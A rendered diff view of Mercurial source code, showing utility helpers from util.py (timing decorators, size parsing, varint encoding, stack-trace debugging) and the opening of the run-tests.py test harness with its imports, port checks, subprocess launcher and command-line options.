3333 elapsed = attr.ib(default=0)
3334 elapsed = attr.ib(default=0)
3334 # the number of nested timedcm context managers.
3335 # the number of nested timedcm context managers.
3335 level = attr.ib(default=1)
3336 level = attr.ib(default=1)
3336
3337
3337 def __bytes__(self):
3338 def __bytes__(self):
3338 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3339 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3339
3340
3340 __str__ = encoding.strmethod(__bytes__)
3341 __str__ = encoding.strmethod(__bytes__)
3341
3342
3342
3343
3343 @contextlib.contextmanager
3344 @contextlib.contextmanager
3344 def timedcm(whencefmt, *whenceargs):
3345 def timedcm(whencefmt, *whenceargs):
3345 """A context manager that produces timing information for a given context.
3346 """A context manager that produces timing information for a given context.
3346
3347
3347 On entering a timedcmstats instance is produced.
3348 On entering a timedcmstats instance is produced.
3348
3349
3349 This context manager is reentrant.
3350 This context manager is reentrant.
3350
3351
3351 """
3352 """
3352 # track nested context managers
3353 # track nested context managers
3353 timedcm._nested += 1
3354 timedcm._nested += 1
3354 timing_stats = timedcmstats(level=timedcm._nested)
3355 timing_stats = timedcmstats(level=timedcm._nested)
3355 try:
3356 try:
3356 with tracing.log(whencefmt, *whenceargs):
3357 with tracing.log(whencefmt, *whenceargs):
3357 yield timing_stats
3358 yield timing_stats
3358 finally:
3359 finally:
3359 timing_stats.elapsed = timer() - timing_stats.start
3360 timing_stats.elapsed = timer() - timing_stats.start
3360 timedcm._nested -= 1
3361 timedcm._nested -= 1
3361
3362
3362
3363
3363 timedcm._nested = 0
3364 timedcm._nested = 0
3364
3365
3365
3366
3366 def timed(func):
3367 def timed(func):
3367 '''Report the execution time of a function call to stderr.
3368 '''Report the execution time of a function call to stderr.
3368
3369
3369 During development, use as a decorator when you need to measure
3370 During development, use as a decorator when you need to measure
3370 the cost of a function, e.g. as follows:
3371 the cost of a function, e.g. as follows:
3371
3372
3372 @util.timed
3373 @util.timed
3373 def foo(a, b, c):
3374 def foo(a, b, c):
3374 pass
3375 pass
3375 '''
3376 '''
3376
3377
3377 def wrapper(*args, **kwargs):
3378 def wrapper(*args, **kwargs):
3378 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3379 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3379 result = func(*args, **kwargs)
3380 result = func(*args, **kwargs)
3380 stderr = procutil.stderr
3381 stderr = procutil.stderr
3381 stderr.write(
3382 stderr.write(
3382 b'%s%s: %s\n'
3383 b'%s%s: %s\n'
3383 % (
3384 % (
3384 b' ' * time_stats.level * 2,
3385 b' ' * time_stats.level * 2,
3385 pycompat.bytestr(func.__name__),
3386 pycompat.bytestr(func.__name__),
3386 time_stats,
3387 time_stats,
3387 )
3388 )
3388 )
3389 )
3389 return result
3390 return result
3390
3391
3391 return wrapper
3392 return wrapper
3392
3393
3393
3394
3394 _sizeunits = (
3395 _sizeunits = (
3395 (b'm', 2 ** 20),
3396 (b'm', 2 ** 20),
3396 (b'k', 2 ** 10),
3397 (b'k', 2 ** 10),
3397 (b'g', 2 ** 30),
3398 (b'g', 2 ** 30),
3398 (b'kb', 2 ** 10),
3399 (b'kb', 2 ** 10),
3399 (b'mb', 2 ** 20),
3400 (b'mb', 2 ** 20),
3400 (b'gb', 2 ** 30),
3401 (b'gb', 2 ** 30),
3401 (b'b', 1),
3402 (b'b', 1),
3402 )
3403 )
3403
3404
3404
3405
3405 def sizetoint(s):
3406 def sizetoint(s):
3406 '''Convert a space specifier to a byte count.
3407 '''Convert a space specifier to a byte count.
3407
3408
3408 >>> sizetoint(b'30')
3409 >>> sizetoint(b'30')
3409 30
3410 30
3410 >>> sizetoint(b'2.2kb')
3411 >>> sizetoint(b'2.2kb')
3411 2252
3412 2252
3412 >>> sizetoint(b'6M')
3413 >>> sizetoint(b'6M')
3413 6291456
3414 6291456
3414 '''
3415 '''
3415 t = s.strip().lower()
3416 t = s.strip().lower()
3416 try:
3417 try:
3417 for k, u in _sizeunits:
3418 for k, u in _sizeunits:
3418 if t.endswith(k):
3419 if t.endswith(k):
3419 return int(float(t[: -len(k)]) * u)
3420 return int(float(t[: -len(k)]) * u)
3420 return int(t)
3421 return int(t)
3421 except ValueError:
3422 except ValueError:
3422 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3423 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3423
3424
3424
3425
3425 class hooks(object):
3426 class hooks(object):
3426 '''A collection of hook functions that can be used to extend a
3427 '''A collection of hook functions that can be used to extend a
3427 function's behavior. Hooks are called in lexicographic order,
3428 function's behavior. Hooks are called in lexicographic order,
3428 based on the names of their sources.'''
3429 based on the names of their sources.'''
3429
3430
3430 def __init__(self):
3431 def __init__(self):
3431 self._hooks = []
3432 self._hooks = []
3432
3433
3433 def add(self, source, hook):
3434 def add(self, source, hook):
3434 self._hooks.append((source, hook))
3435 self._hooks.append((source, hook))
3435
3436
3436 def __call__(self, *args):
3437 def __call__(self, *args):
3437 self._hooks.sort(key=lambda x: x[0])
3438 self._hooks.sort(key=lambda x: x[0])
3438 results = []
3439 results = []
3439 for source, hook in self._hooks:
3440 for source, hook in self._hooks:
3440 results.append(hook(*args))
3441 results.append(hook(*args))
3441 return results
3442 return results
3442
3443
3443
3444
3444 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3445 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3445 '''Yields lines for a nicely formatted stacktrace.
3446 '''Yields lines for a nicely formatted stacktrace.
3446 Skips the 'skip' last entries, then return the last 'depth' entries.
3447 Skips the 'skip' last entries, then return the last 'depth' entries.
3447 Each file+linenumber is formatted according to fileline.
3448 Each file+linenumber is formatted according to fileline.
3448 Each line is formatted according to line.
3449 Each line is formatted according to line.
3449 If line is None, it yields:
3450 If line is None, it yields:
3450 length of longest filepath+line number,
3451 length of longest filepath+line number,
3451 filepath+linenumber,
3452 filepath+linenumber,
3452 function
3453 function
3453
3454
3454 Not be used in production code but very convenient while developing.
3455 Not be used in production code but very convenient while developing.
3455 '''
3456 '''
3456 entries = [
3457 entries = [
3457 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3458 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3458 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3459 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3459 ][-depth:]
3460 ][-depth:]
3460 if entries:
3461 if entries:
3461 fnmax = max(len(entry[0]) for entry in entries)
3462 fnmax = max(len(entry[0]) for entry in entries)
3462 for fnln, func in entries:
3463 for fnln, func in entries:
3463 if line is None:
3464 if line is None:
3464 yield (fnmax, fnln, func)
3465 yield (fnmax, fnln, func)
3465 else:
3466 else:
3466 yield line % (fnmax, fnln, func)
3467 yield line % (fnmax, fnln, func)
3467
3468
3468
3469
def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        # Flush the other stream first so the trace is not interleaved with
        # buffered output (stdout by default).
        otherf.flush()
    f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
    # skip + 1 also hides this function's own frame from the output.
    for line in getstackframes(skip + 1, depth=depth):
        f.write(prefix + line)
    f.flush()


# convenient shortcut
dst = debugstacktrace
3493
3494
3494
3495
3495 def safename(f, tag, ctx, others=None):
3496 def safename(f, tag, ctx, others=None):
3496 """
3497 """
3497 Generate a name that it is safe to rename f to in the given context.
3498 Generate a name that it is safe to rename f to in the given context.
3498
3499
3499 f: filename to rename
3500 f: filename to rename
3500 tag: a string tag that will be included in the new name
3501 tag: a string tag that will be included in the new name
3501 ctx: a context, in which the new name must not exist
3502 ctx: a context, in which the new name must not exist
3502 others: a set of other filenames that the new name must not be in
3503 others: a set of other filenames that the new name must not be in
3503
3504
3504 Returns a file name of the form oldname~tag[~number] which does not exist
3505 Returns a file name of the form oldname~tag[~number] which does not exist
3505 in the provided context and is not in the set of other names.
3506 in the provided context and is not in the set of other names.
3506 """
3507 """
3507 if others is None:
3508 if others is None:
3508 others = set()
3509 others = set()
3509
3510
3510 fn = b'%s~%s' % (f, tag)
3511 fn = b'%s~%s' % (f, tag)
3511 if fn not in ctx and fn not in others:
3512 if fn not in ctx and fn not in others:
3512 return fn
3513 return fn
3513 for n in itertools.count(1):
3514 for n in itertools.count(1):
3514 fn = b'%s~%s~%s' % (f, tag, n)
3515 fn = b'%s~%s~%s' % (f, tag, n)
3515 if fn not in ctx and fn not in others:
3516 if fn not in ctx and fn not in others:
3516 return fn
3517 return fn
3517
3518
3518
3519
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        # A short read means the stream was truncated; surface it as an
        # explicit abort rather than returning partial data.
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(s), n)
        )
    return s
3528
3529
3529
3530
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    # Emit 7 bits at a time, least significant group first; every byte but
    # the final one carries the 0x80 continuation flag.
    bits = value & 0x7F
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7F
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return b''.join(bytes)
3565
3566
3566
3567
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    # Accumulate 7 bits per byte until a byte without the 0x80 continuation
    # flag terminates the value.  readexactly() aborts on truncated input.
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7F) << shift
        if not (byte & 0x80):
            return result
        shift += 7
3600
3601
# Passing the '' locale means that the locale should be set according to the
# user settings (environment variables).
# Python sometimes avoids setting the global locale settings. When interfacing
# with C code (e.g. the curses module or the Subversion bindings), the global
# locale settings must be initialized correctly. Python 2 does not initialize
# the global locale settings on interpreter startup. Python 3 sometimes
# initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
# explicitly initialize it to get consistent behavior if it's not already
# initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
# LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
# if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    # Only touch LC_CTYPE while it is still the interpreter default ("C");
    # anything else means it was already initialized and must be left alone.
    saved = locale.setlocale(locale.LC_CTYPE, None)
    if saved != 'C':
        yield
        return
    try:
        try:
            locale.setlocale(locale.LC_CTYPE, '')
        except locale.Error:
            # The likely case is that the locale from the environment
            # variables is unknown.
            pass
        yield
    finally:
        locale.setlocale(locale.LC_CTYPE, saved)
@@ -1,3768 +1,3768 b''
1 #!/usr/bin/env python
1 #!/usr/bin/env python
2 #
2 #
3 # run-tests.py - Run a set of tests on Mercurial
3 # run-tests.py - Run a set of tests on Mercurial
4 #
4 #
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Matt Mackall <mpm@selenic.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 # Modifying this script is tricky because it has many modes:
10 # Modifying this script is tricky because it has many modes:
11 # - serial (default) vs parallel (-jN, N > 1)
11 # - serial (default) vs parallel (-jN, N > 1)
12 # - no coverage (default) vs coverage (-c, -C, -s)
12 # - no coverage (default) vs coverage (-c, -C, -s)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
13 # - temp install (default) vs specific hg script (--with-hg, --local)
14 # - tests are a mix of shell scripts and Python scripts
14 # - tests are a mix of shell scripts and Python scripts
15 #
15 #
16 # If you change this script, it is recommended that you ensure you
16 # If you change this script, it is recommended that you ensure you
17 # haven't broken it by running it in various modes with a representative
17 # haven't broken it by running it in various modes with a representative
18 # sample of test scripts. For example:
18 # sample of test scripts. For example:
19 #
19 #
20 # 1) serial, no coverage, temp install:
20 # 1) serial, no coverage, temp install:
21 # ./run-tests.py test-s*
21 # ./run-tests.py test-s*
22 # 2) serial, no coverage, local hg:
22 # 2) serial, no coverage, local hg:
23 # ./run-tests.py --local test-s*
23 # ./run-tests.py --local test-s*
24 # 3) serial, coverage, temp install:
24 # 3) serial, coverage, temp install:
25 # ./run-tests.py -c test-s*
25 # ./run-tests.py -c test-s*
26 # 4) serial, coverage, local hg:
26 # 4) serial, coverage, local hg:
27 # ./run-tests.py -c --local test-s* # unsupported
27 # ./run-tests.py -c --local test-s* # unsupported
28 # 5) parallel, no coverage, temp install:
28 # 5) parallel, no coverage, temp install:
29 # ./run-tests.py -j2 test-s*
29 # ./run-tests.py -j2 test-s*
30 # 6) parallel, no coverage, local hg:
30 # 6) parallel, no coverage, local hg:
31 # ./run-tests.py -j2 --local test-s*
31 # ./run-tests.py -j2 --local test-s*
32 # 7) parallel, coverage, temp install:
32 # 7) parallel, coverage, temp install:
33 # ./run-tests.py -j2 -c test-s* # currently broken
33 # ./run-tests.py -j2 -c test-s* # currently broken
34 # 8) parallel, coverage, local install:
34 # 8) parallel, coverage, local install:
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
35 # ./run-tests.py -j2 -c --local test-s* # unsupported (and broken)
36 # 9) parallel, custom tmp dir:
36 # 9) parallel, custom tmp dir:
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
37 # ./run-tests.py -j2 --tmpdir /tmp/myhgtests
38 # 10) parallel, pure, tests that call run-tests:
38 # 10) parallel, pure, tests that call run-tests:
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
39 # ./run-tests.py --pure `grep -l run-tests.py *.t`
40 #
40 #
41 # (You could use any subset of the tests: test-s* happens to match
41 # (You could use any subset of the tests: test-s* happens to match
42 # enough that it's worth doing parallel runs, few enough that it
42 # enough that it's worth doing parallel runs, few enough that it
43 # completes fairly quickly, includes both shell and Python scripts, and
43 # completes fairly quickly, includes both shell and Python scripts, and
44 # includes some scripts that run daemon processes.)
44 # includes some scripts that run daemon processes.)
45
45
46 from __future__ import absolute_import, print_function
46 from __future__ import absolute_import, print_function
47
47
48 import argparse
48 import argparse
49 import collections
49 import collections
50 import difflib
50 import difflib
51 import distutils.version as version
51 import distutils.version as version
52 import errno
52 import errno
53 import json
53 import json
54 import multiprocessing
54 import multiprocessing
55 import os
55 import os
56 import platform
56 import platform
57 import random
57 import random
58 import re
58 import re
59 import shutil
59 import shutil
60 import signal
60 import signal
61 import socket
61 import socket
62 import subprocess
62 import subprocess
63 import sys
63 import sys
64 import sysconfig
64 import sysconfig
65 import tempfile
65 import tempfile
66 import threading
66 import threading
67 import time
67 import time
68 import unittest
68 import unittest
69 import uuid
69 import uuid
70 import xml.dom.minidom as minidom
70 import xml.dom.minidom as minidom
71
71
# Py2/py3 compatibility shims: the stdlib queue module and shell quoting
# helper live under different names depending on the Python version.
try:
    import Queue as queue
except ImportError:
    import queue

try:
    import shlex

    shellquote = shlex.quote
except (ImportError, AttributeError):
    import pipes

    shellquote = pipes.quote
85
85
# Serializes subprocess creation (see Popen4 below).
processlock = threading.Lock()

pygmentspresent = False
# ANSI color is unsupported prior to Windows 10
if os.name != 'nt':
    try:  # is pygments installed
        import pygments
        import pygments.lexers as lexers
        import pygments.lexer as lexer
        import pygments.formatters as formatters
        import pygments.token as token
        import pygments.style as style

        pygmentspresent = True
        difflexer = lexers.DiffLexer()
        terminal256formatter = formatters.Terminal256Formatter()
    except ImportError:
        pass
104
104
if pygmentspresent:

    class TestRunnerStyle(style.Style):
        # Pygments style coloring skipped/failed test names in summaries.
        default_style = ""
        skipped = token.string_to_tokentype("Token.Generic.Skipped")
        failed = token.string_to_tokentype("Token.Generic.Failed")
        skippedname = token.string_to_tokentype("Token.Generic.SName")
        failedname = token.string_to_tokentype("Token.Generic.FName")
        styles = {
            skipped: '#e5e5e5',
            skippedname: '#00ffff',
            failed: '#7f0000',
            failedname: '#ff0000',
        }

    class TestRunnerLexer(lexer.RegexLexer):
        # Tokenizes run-tests summary lines ("Skipped ...", "Failed ...",
        # "ERROR: ...") so the formatter above can color them.
        testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
        tokens = {
            'root': [
                (r'^Skipped', token.Generic.Skipped, 'skipped'),
                (r'^Failed ', token.Generic.Failed, 'failed'),
                (r'^ERROR: ', token.Generic.Failed, 'failed'),
            ],
            'skipped': [
                (testpattern, token.Generic.SName),
                (r':.*', token.Generic.Skipped),
            ],
            'failed': [
                (testpattern, token.Generic.FName),
                (r'(:| ).*', token.Generic.Failed),
            ],
        }

    runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
    runnerlexer = TestRunnerLexer()
140
140
141 origenviron = os.environ.copy()
141 origenviron = os.environ.copy()
142
142
143 if sys.version_info > (3, 5, 0):
143 if sys.version_info > (3, 5, 0):
144 PYTHON3 = True
144 PYTHON3 = True
145 xrange = range # we use xrange in one place, and we'd rather not use range
145 xrange = range # we use xrange in one place, and we'd rather not use range
146
146
147 def _sys2bytes(p):
147 def _sys2bytes(p):
148 if p is None:
148 if p is None:
149 return p
149 return p
150 return p.encode('utf-8')
150 return p.encode('utf-8')
151
151
152 def _bytes2sys(p):
152 def _bytes2sys(p):
153 if p is None:
153 if p is None:
154 return p
154 return p
155 return p.decode('utf-8')
155 return p.decode('utf-8')
156
156
157 osenvironb = getattr(os, 'environb', None)
157 osenvironb = getattr(os, 'environb', None)
158 if osenvironb is None:
158 if osenvironb is None:
159 # Windows lacks os.environb, for instance. A proxy over the real thing
159 # Windows lacks os.environb, for instance. A proxy over the real thing
160 # instead of a copy allows the environment to be updated via bytes on
160 # instead of a copy allows the environment to be updated via bytes on
161 # all platforms.
161 # all platforms.
162 class environbytes(object):
162 class environbytes(object):
163 def __init__(self, strenv):
163 def __init__(self, strenv):
164 self.__len__ = strenv.__len__
164 self.__len__ = strenv.__len__
165 self.clear = strenv.clear
165 self.clear = strenv.clear
166 self._strenv = strenv
166 self._strenv = strenv
167
167
168 def __getitem__(self, k):
168 def __getitem__(self, k):
169 v = self._strenv.__getitem__(_bytes2sys(k))
169 v = self._strenv.__getitem__(_bytes2sys(k))
170 return _sys2bytes(v)
170 return _sys2bytes(v)
171
171
172 def __setitem__(self, k, v):
172 def __setitem__(self, k, v):
173 self._strenv.__setitem__(_bytes2sys(k), _bytes2sys(v))
173 self._strenv.__setitem__(_bytes2sys(k), _bytes2sys(v))
174
174
175 def __delitem__(self, k):
175 def __delitem__(self, k):
176 self._strenv.__delitem__(_bytes2sys(k))
176 self._strenv.__delitem__(_bytes2sys(k))
177
177
178 def __contains__(self, k):
178 def __contains__(self, k):
179 return self._strenv.__contains__(_bytes2sys(k))
179 return self._strenv.__contains__(_bytes2sys(k))
180
180
181 def __iter__(self):
181 def __iter__(self):
182 return iter([_sys2bytes(k) for k in iter(self._strenv)])
182 return iter([_sys2bytes(k) for k in iter(self._strenv)])
183
183
184 def get(self, k, default=None):
184 def get(self, k, default=None):
185 v = self._strenv.get(_bytes2sys(k), _bytes2sys(default))
185 v = self._strenv.get(_bytes2sys(k), _bytes2sys(default))
186 return _sys2bytes(v)
186 return _sys2bytes(v)
187
187
188 def pop(self, k, default=None):
188 def pop(self, k, default=None):
189 v = self._strenv.pop(_bytes2sys(k), _bytes2sys(default))
189 v = self._strenv.pop(_bytes2sys(k), _bytes2sys(default))
190 return _sys2bytes(v)
190 return _sys2bytes(v)
191
191
192 osenvironb = environbytes(os.environ)
192 osenvironb = environbytes(os.environ)
193
193
194 getcwdb = getattr(os, 'getcwdb')
194 getcwdb = getattr(os, 'getcwdb')
195 if not getcwdb or os.name == 'nt':
195 if not getcwdb or os.name == 'nt':
196 getcwdb = lambda: _sys2bytes(os.getcwd())
196 getcwdb = lambda: _sys2bytes(os.getcwd())
197
197
198 elif sys.version_info >= (3, 0, 0):
198 elif sys.version_info >= (3, 0, 0):
199 print(
199 print(
200 '%s is only supported on Python 3.5+ and 2.7, not %s'
200 '%s is only supported on Python 3.5+ and 2.7, not %s'
201 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
201 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
202 )
202 )
203 sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
203 sys.exit(70) # EX_SOFTWARE from `man 3 sysexit`
204 else:
204 else:
205 PYTHON3 = False
205 PYTHON3 = False
206
206
207 # In python 2.x, path operations are generally done using
207 # In python 2.x, path operations are generally done using
208 # bytestrings by default, so we don't have to do any extra
208 # bytestrings by default, so we don't have to do any extra
209 # fiddling there. We define the wrapper functions anyway just to
209 # fiddling there. We define the wrapper functions anyway just to
210 # help keep code consistent between platforms.
210 # help keep code consistent between platforms.
211 def _sys2bytes(p):
211 def _sys2bytes(p):
212 return p
212 return p
213
213
214 _bytes2sys = _sys2bytes
214 _bytes2sys = _sys2bytes
215 osenvironb = os.environ
215 osenvironb = os.environ
216 getcwdb = os.getcwd
216 getcwdb = os.getcwd
217
217
# For Windows support: os.WIFEXITED does not exist there, so fall back to a
# stub that reports "not exited".
wifexited = getattr(os, "WIFEXITED", lambda x: False)
220
220
# Whether to use IPv6
def checksocketfamily(name, port=20058):
    """return true if we can listen on localhost using family=name

    name should be either 'AF_INET', or 'AF_INET6'.
    port being used is okay - EADDRINUSE is considered as successful.
    """
    family = getattr(socket, name, None)
    if family is None:
        # The platform does not even define the address family.
        return False
    try:
        s = socket.socket(family, socket.SOCK_STREAM)
        s.bind(('localhost', port))
        s.close()
        return True
    except socket.error as exc:
        if exc.errno == errno.EADDRINUSE:
            # Someone else listening on the probe port still proves the
            # family works.
            return True
        elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
            return False
        else:
            raise
    else:
        return False
245
245
246
246
# useipv6 will be set by parseargs
useipv6 = None
249
249
250
250
def checkportisavailable(port):
    """return true if a port seems free to bind on localhost"""
    # Honor the IPv6/IPv4 choice made by parseargs (module-level useipv6).
    if useipv6:
        family = socket.AF_INET6
    else:
        family = socket.AF_INET
    try:
        s = socket.socket(family, socket.SOCK_STREAM)
        s.bind(('localhost', port))
        s.close()
        return True
    except socket.error as exc:
        # These errnos simply mean "not available"; anything else is a real
        # failure worth propagating.
        if exc.errno not in (
            errno.EADDRINUSE,
            errno.EADDRNOTAVAIL,
            errno.EPROTONOSUPPORT,
        ):
            raise
    return False
270
270
271
271
closefds = os.name == 'posix'


def Popen4(cmd, wd, timeout, env=None):
    """Spawn `cmd` through a shell in directory `wd` and return the process.

    The returned subprocess.Popen object is given popen2-style aliases
    (fromchild, tochild, childerr).  If `timeout` is non-zero, a watchdog
    thread terminates the process once the timeout elapses and marks
    `p.timeout = True`.
    """
    # Serialize process creation; inherited handles on some platforms make
    # concurrent Popen calls unsafe.
    processlock.acquire()
    p = subprocess.Popen(
        _bytes2sys(cmd),
        shell=True,
        bufsize=-1,
        cwd=_bytes2sys(wd),
        env=env,
        close_fds=closefds,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )
    processlock.release()

    p.fromchild = p.stdout
    p.tochild = p.stdin
    p.childerr = p.stderr

    p.timeout = False
    if timeout:

        def t():
            # Poll until the deadline, then kill the child if still running.
            start = time.time()
            while time.time() - start < timeout and p.returncode is None:
                time.sleep(0.1)
            p.timeout = True
            if p.returncode is None:
                terminate(p)

        threading.Thread(target=t).start()

    return p
308
308
309
309
# Locate the Python interpreter driving this run; abort early if none can
# be determined since every child test needs it.
if sys.executable:
    sysexecutable = sys.executable
elif os.environ.get('PYTHONEXECUTABLE'):
    sysexecutable = os.environ['PYTHONEXECUTABLE']
elif os.environ.get('PYTHON'):
    sysexecutable = os.environ['PYTHON']
else:
    raise AssertionError('Could not find Python interpreter')

# Forward slashes keep the path shell-safe on Windows too.
PYTHON = _sys2bytes(sysexecutable.replace('\\', '/'))
IMPL_PATH = b'PYTHONPATH'
if 'java' in sys.platform:
    IMPL_PATH = b'JYTHONPATH'
323
323
# Built-in option defaults: each entry maps an option name to the
# (environment variable override, fallback value) pair.
default_defaults = {
    'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
    'timeout': ('HGTEST_TIMEOUT', 180),
    'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
    'port': ('HGTEST_PORT', 20059),
    'shell': ('HGTEST_SHELL', 'sh'),
}

# Mutable working copy; default_defaults stays pristine for reference.
defaults = default_defaults.copy()
333
333
334
334
def canonpath(path):
    """Return `path` with ~ expanded and symlinks/relative parts resolved."""
    return os.path.realpath(os.path.expanduser(path))
337
337
338
338
def parselistfiles(files, listtype, warn=True):
    """Parse blacklist/whitelist files into a {test name: filename} dict.

    Each line is stripped of '#' comments and surrounding whitespace; blank
    lines are ignored.  Missing files are skipped, with a warning printed
    unless `warn` is False; other IOErrors propagate.
    """
    entries = dict()
    for filename in files:
        try:
            path = os.path.expanduser(os.path.expandvars(filename))
            f = open(path, "rb")
        except IOError as err:
            if err.errno != errno.ENOENT:
                raise
            if warn:
                print("warning: no such %s file: %s" % (listtype, filename))
            continue

        for line in f.readlines():
            line = line.split(b'#', 1)[0].strip()
            if line:
                entries[line] = filename

        f.close()
    return entries
359
359
360
360
def parsettestcases(path):
    """read a .t test file, return a set of test case names

    If path does not exist, return an empty set.
    """
    cases = []
    try:
        with open(path, 'rb') as f:
            for l in f:
                if l.startswith(b'#testcases '):
                    # l[11:] skips the b'#testcases ' prefix.
                    cases.append(sorted(l[11:].split()))
    except IOError as ex:
        if ex.errno != errno.ENOENT:
            raise
    return cases
376
376
377
377
378 def getparser():
378 def getparser():
379 """Obtain the OptionParser used by the CLI."""
379 """Obtain the OptionParser used by the CLI."""
380 parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')
380 parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')
381
381
382 selection = parser.add_argument_group('Test Selection')
382 selection = parser.add_argument_group('Test Selection')
383 selection.add_argument(
383 selection.add_argument(
384 '--allow-slow-tests',
384 '--allow-slow-tests',
385 action='store_true',
385 action='store_true',
386 help='allow extremely slow tests',
386 help='allow extremely slow tests',
387 )
387 )
388 selection.add_argument(
388 selection.add_argument(
389 "--blacklist",
389 "--blacklist",
390 action="append",
390 action="append",
391 help="skip tests listed in the specified blacklist file",
391 help="skip tests listed in the specified blacklist file",
392 )
392 )
393 selection.add_argument(
393 selection.add_argument(
394 "--changed",
394 "--changed",
395 help="run tests that are changed in parent rev or working directory",
395 help="run tests that are changed in parent rev or working directory",
396 )
396 )
397 selection.add_argument(
397 selection.add_argument(
398 "-k", "--keywords", help="run tests matching keywords"
398 "-k", "--keywords", help="run tests matching keywords"
399 )
399 )
400 selection.add_argument(
400 selection.add_argument(
401 "-r", "--retest", action="store_true", help="retest failed tests"
401 "-r", "--retest", action="store_true", help="retest failed tests"
402 )
402 )
403 selection.add_argument(
403 selection.add_argument(
404 "--test-list",
404 "--test-list",
405 action="append",
405 action="append",
406 help="read tests to run from the specified file",
406 help="read tests to run from the specified file",
407 )
407 )
408 selection.add_argument(
408 selection.add_argument(
409 "--whitelist",
409 "--whitelist",
410 action="append",
410 action="append",
411 help="always run tests listed in the specified whitelist file",
411 help="always run tests listed in the specified whitelist file",
412 )
412 )
413 selection.add_argument(
413 selection.add_argument(
414 'tests', metavar='TESTS', nargs='*', help='Tests to run'
414 'tests', metavar='TESTS', nargs='*', help='Tests to run'
415 )
415 )
416
416
417 harness = parser.add_argument_group('Test Harness Behavior')
417 harness = parser.add_argument_group('Test Harness Behavior')
418 harness.add_argument(
418 harness.add_argument(
419 '--bisect-repo',
419 '--bisect-repo',
420 metavar='bisect_repo',
420 metavar='bisect_repo',
421 help=(
421 help=(
422 "Path of a repo to bisect. Use together with " "--known-good-rev"
422 "Path of a repo to bisect. Use together with " "--known-good-rev"
423 ),
423 ),
424 )
424 )
425 harness.add_argument(
425 harness.add_argument(
426 "-d",
426 "-d",
427 "--debug",
427 "--debug",
428 action="store_true",
428 action="store_true",
429 help="debug mode: write output of test scripts to console"
429 help="debug mode: write output of test scripts to console"
430 " rather than capturing and diffing it (disables timeout)",
430 " rather than capturing and diffing it (disables timeout)",
431 )
431 )
432 harness.add_argument(
